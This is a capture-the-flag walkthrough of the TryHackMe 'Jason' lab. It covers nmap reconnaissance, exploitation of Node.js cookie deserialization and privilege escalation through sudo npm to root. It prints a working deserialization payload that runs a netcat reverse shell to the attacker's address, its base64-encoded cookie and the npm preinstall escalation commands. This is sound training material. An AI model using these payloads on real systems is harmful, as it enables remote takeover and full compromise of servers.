Post

TryHackMe - Jason

Introduction

This is a TryHackMe room which can be found at: Jason

In JavaScript everything is a terrible mistake.

Reconnaissance & Scanning

Perform nmap scan to identify open ports and services.

  • Command: nmap -p- -T4 -v 10.10.121.122
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
geobour98@kali:~$ nmap -p- -T4 -v 10.10.121.122
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-31 19:39 EEST
Initiating Ping Scan at 19:39
Scanning 10.10.121.122 [2 ports]
Completed Ping Scan at 19:39, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:39
Completed Parallel DNS resolution of 1 host. at 19:39, 0.00s elapsed
Initiating Connect Scan at 19:39
Scanning 10.10.121.122 (10.10.121.122) [65535 ports]
Discovered open port 80/tcp on 10.10.121.122
Discovered open port 22/tcp on 10.10.121.122
Connect Scan Timing: About 42.14% done; ETC: 19:40 (0:00:43 remaining)
Completed Connect Scan at 19:40, 63.87s elapsed (65535 total ports)
Nmap scan report for 10.10.121.122 (10.10.121.122)
Host is up (0.068s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 63.97 seconds

Perform aggressive nmap scan to enable OS detection, default scripts and version detection on the found ports.

  • Command: sudo nmap -A -sC -p 22,80 -v 10.10.121.122
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
geobour98@kali:~$ sudo nmap -A -sC -p 22,80 -v 10.10.121.122
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-31 19:41 EEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating Ping Scan at 19:41
Scanning 10.10.121.122 [4 ports]
Completed Ping Scan at 19:41, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:41
Completed Parallel DNS resolution of 1 host. at 19:41, 0.00s elapsed
Initiating SYN Stealth Scan at 19:41
Scanning 10.10.121.122 (10.10.121.122) [2 ports]
Discovered open port 22/tcp on 10.10.121.122
Discovered open port 80/tcp on 10.10.121.122
Completed SYN Stealth Scan at 19:41, 0.12s elapsed (2 total ports)
Initiating Service scan at 19:41
Scanning 2 services on 10.10.121.122 (10.10.121.122)
Completed Service scan at 19:41, 15.27s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.121.122 (10.10.121.122)
Retrying OS detection (try #2) against 10.10.121.122 (10.10.121.122)
Initiating Traceroute at 19:41
Completed Traceroute at 19:41, 0.07s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:41
Completed Parallel DNS resolution of 1 host. at 19:41, 0.00s elapsed
NSE: Script scanning 10.10.121.122.
Initiating NSE at 19:41
Completed NSE at 19:41, 3.53s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.14s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Nmap scan report for 10.10.121.122 (10.10.121.122)
Host is up (0.069s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5b:2d:9d:60:a7:45:de:7a:99:20:3e:42:94:ce:19:3c (RSA)
|   256 bf:32:78:01:83:af:78:5e:e7:fe:9c:83:4a:7d:aa:6b (ECDSA)
|_  256 12:ab:13:80:e5:ad:73:07:c8:48:d5:ca:7c:7d:e0:af (ED25519)
80/tcp open  http
|_http-favicon: Unknown favicon MD5: 8FCEA7DE73B9ED47DE799DB3AE6363A8
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Wed, 31 Aug 2022 16:41:22 GMT
|     Connection: close
|     <html><head>
|     <title>Horror LLC</title>
|     <style>
|     body {
|     background: linear-gradient(253deg, #4a040d, #3b0b54, #3a343b);
|     background-size: 300% 300%;
|     -webkit-animation: Background 10s ease infinite;
|     -moz-animation: Background 10s ease infinite;
|     animation: Background 10s ease infinite;
|     @-webkit-keyframes Background {
|     background-position: 0% 50%
|     background-position: 100% 50%
|     100% {
|     background-position: 0% 50%
|     @-moz-keyframes Background {
|     background-position: 0% 50%
|     background-position: 100% 50%
|     100% {
|     background-position: 0% 50%
|     @keyframes Background {
|     background-position: 0% 50%
|     background-posi
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Wed, 31 Aug 2022 16:41:23 GMT
|     Connection: close
|     <html><head>
|     <title>Horror LLC</title>
|     <style>
|     body {
|     background: linear-gradient(253deg, #4a040d, #3b0b54, #3a343b);
|     background-size: 300% 300%;
|     -webkit-animation: Background 10s ease infinite;
|     -moz-animation: Background 10s ease infinite;
|     animation: Background 10s ease infinite;
|     @-webkit-keyframes Background {
|     background-position: 0% 50%
|     background-position: 100% 50%
|     100% {
|     background-position: 0% 50%
|     @-moz-keyframes Background {
|     background-position: 0% 50%
|     background-position: 100% 50%
|     100% {
|     background-position: 0% 50%
|     @keyframes Background {
|     background-position: 0% 50%
|_    background-posi
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Horror LLC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.92%I=7%D=8/31%Time=630F8F33%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,E4B,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html\r\nDat
SF:e:\x20Wed,\x2031\x20Aug\x202022\x2016:41:22\x20GMT\r\nConnection:\x20cl
SF:ose\r\n\r\n<html><head>\n<title>Horror\x20LLC</title>\n<style>\n\x20\x2
SF:0body\x20{\n\x20\x20\x20\x20background:\x20linear-gradient\(253deg,\x20
SF:#4a040d,\x20#3b0b54,\x20#3a343b\);\n\x20\x20\x20\x20background-size:\x2
SF:0300%\x20300%;\n\x20\x20\x20\x20-webkit-animation:\x20Background\x2010s
SF:\x20ease\x20infinite;\n\x20\x20\x20\x20-moz-animation:\x20Background\x2
SF:010s\x20ease\x20infinite;\n\x20\x20\x20\x20animation:\x20Background\x20
SF:10s\x20ease\x20infinite;\n\x20\x20}\n\x20\x20\n\x20\x20@-webkit-keyfram
SF:es\x20Background\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x2
SF:0background-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20
SF:50%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x20100%\x2050%\n
SF:\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\x20{\n\x20\x20\x20\x20\x20\x20b
SF:ackground-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20}\n\x20\x2
SF:0\n\x20\x20@-moz-keyframes\x20Background\x20{\n\x20\x20\x20\x200%\x20{\
SF:n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x20\x2
SF:0\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x20\x20background-po
SF:sition:\x20100%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\x20{\n\
SF:x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x20\x20\
SF:x20}\n\x20\x20}\n\x20\x20\n\x20\x20@keyframes\x20Background\x20{\n\x20\
SF:x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\
SF:x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x
SF:20\x20background-posi")%r(HTTPOptions,E4B,"HTTP/1\.1\x20200\x20OK\r\nCo
SF:ntent-Type:\x20text/html\r\nDate:\x20Wed,\x2031\x20Aug\x202022\x2016:41
SF::23\x20GMT\r\nConnection:\x20close\r\n\r\n<html><head>\n<title>Horror\x
SF:20LLC</title>\n<style>\n\x20\x20body\x20{\n\x20\x20\x20\x20background:\
SF:x20linear-gradient\(253deg,\x20#4a040d,\x20#3b0b54,\x20#3a343b\);\n\x20
SF:\x20\x20\x20background-size:\x20300%\x20300%;\n\x20\x20\x20\x20-webkit-
SF:animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20\x20\x20-
SF:moz-animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20\x20\
SF:x20animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20}\n\x2
SF:0\x20\n\x20\x20@-webkit-keyframes\x20Background\x20{\n\x20\x20\x20\x200
SF:%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20
SF:\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x20\x20backgr
SF:ound-position:\x20100%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\
SF:x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x
SF:20\x20\x20}\n\x20\x20}\n\x20\x20\n\x20\x20@-moz-keyframes\x20Background
SF:\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x20background-posi
SF:tion:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x
SF:20\x20\x20\x20\x20background-position:\x20100%\x2050%\n\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20100%\x20{\n\x20\x20\x20\x20\x20\x20background-positi
SF:on:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20}\n\x20\x20\n\x20\x20@keyf
SF:rames\x20Background\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20
SF:\x20background-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\
SF:x2050%\x20{\n\x20\x20\x20\x20\x20\x20background-posi");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 24.723 days (since Sun Aug  7 02:20:54 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   69.85 ms 10.8.0.1 (10.8.0.1)
2   68.05 ms 10.10.121.122 (10.10.121.122)

NSE: Script Post-scanning.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.71 seconds
           Raw packets sent: 75 (5.900KB) | Rcvd: 57 (4.656KB)

Navigate to port 80, in the Email address field put test@test.com, open Burp Suite and Intercept the request. Then send it to Repeater.

The request should look like this:

1
2
3
4
5
6
7
8
9
10
11
12
POST /?email=test@test.com HTTP/1.1
Host: 10.10.121.122
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://10.10.121.122
Connection: close
Referer: http://10.10.121.122/
Content-Length: 0


Click the Send button and notice the response:

1
2
3
4
5
6
7
8
9
HTTP/1.1 200 OK
Set-Cookie: session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ==; Max-Age=900000; HttpOnly, Secure
Content-Type: text/html
Date: Wed, 31 Aug 2022 16:48:27 GMT
Connection: close
Content-Length: 3559

[REDACTED]

In the Set-Cookie header if we decode the session value from base64 we identify a serialized object.

  • Command: echo -n "eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ==" | base64 -d
1
2
geobour98@kali:~$ echo -n "eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ==" | base64 -d
{"email":"test@test.com"}

Exploitation

Go in Decoder in Burp Suite and craft a serialized object like this:

1
{"email":"_$$ND_FUNC$$_function (){require('child_process').exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.200.50 443 >/tmp/f\", function(error, stdout, stderr) { console.log(stdout) });}()"}

Click on Encode as and select Base64 so the output should look like this:

1
eyJlbWFpbCI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYyhcInJtIC90bXAvZjtta2ZpZm8gL3RtcC9mO2NhdCAvdG1wL2Z8L2Jpbi9zaCAtaSAyPiYxfG5jIDEwLjguMjAwLjUwIDQ0MyA+L3RtcC9mXCIsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQpIH0pO30oKSJ9

Next, go to http://10.10.121.122, refresh the page, Intercept the request, add a Cookie header with the base64 encoded value into the session.

The request should look like this:

1
2
3
4
5
6
7
8
9
10
11
12
GET / HTTP/1.1
Host: 10.10.121.122
Cookie: session=eyJlbWFpbCI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYyhcInJtIC90bXAvZjtta2ZpZm8gL3RtcC9mO2NhdCAvdG1wL2Z8L2Jpbi9zaCAtaSAyPiYxfG5jIDEwLjguMjAwLjUwIDQ0MyA+L3RtcC9mXCIsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQpIH0pO30oKSJ9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


Open a netcat listener and click Forward and we get a reverse shell as dylan

1
2
3
4
5
6
7
8
9
geobour98@kali:~$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.8.200.50] from (UNKNOWN) [10.10.121.122] 53470
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
dylan@jason:/opt/webapp$ whoami
whoami
dylan
dylan@jason:/opt/webapp$

The server performed deserialization of the Cookie header so the reverse shell was executed. The payload used can be found in this great article: Exploiting Node.js deserialization bug for Remote Code Execution, which is about Node.js deserialization as in our case.

We can also read the user.txt flag:

1
2
3
4
5
dylan@jason:/opt/webapp$ cd /home/dylan
cd /home/dylan
dylan@jason:~$ cat user.txt
cat user.txt
[REDACTED]

Privilege Escalation

After executing the command: sudo -l we see that we can execute npm without being asked for root password.

1
2
3
4
5
6
7
8
dylan@jason:~$ sudo -l
sudo -l
Matching Defaults entries for dylan on jason:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dylan may run the following commands on jason:
    (ALL) NOPASSWD: /usr/bin/npm *

A great exploit for this can be found on: GTFObins npm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
dylan@jason:~$ TF=$(mktemp -d)
dylan@jason:~$ echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
dylan@jason:~$ sudo npm -C $TF --unsafe-perm i
sudo npm -C $TF --unsafe-perm i

> @ preinstall /tmp/tmp.DaaEyPR9DZ
> /bin/sh

# bash
bash
root@jason:/tmp/tmp.DaaEyPR9DZ# id
id
uid=0(root) gid=0(root) groups=0(root)
root@jason:/tmp/tmp.DaaEyPR9DZ# cd /root
cd /root
root@jason:~# cat root.txt
cat root.txt
[REDACTED]

Proof of Concept (PoC image): Desktop View

This post is licensed under CC BY 4.0 by the author.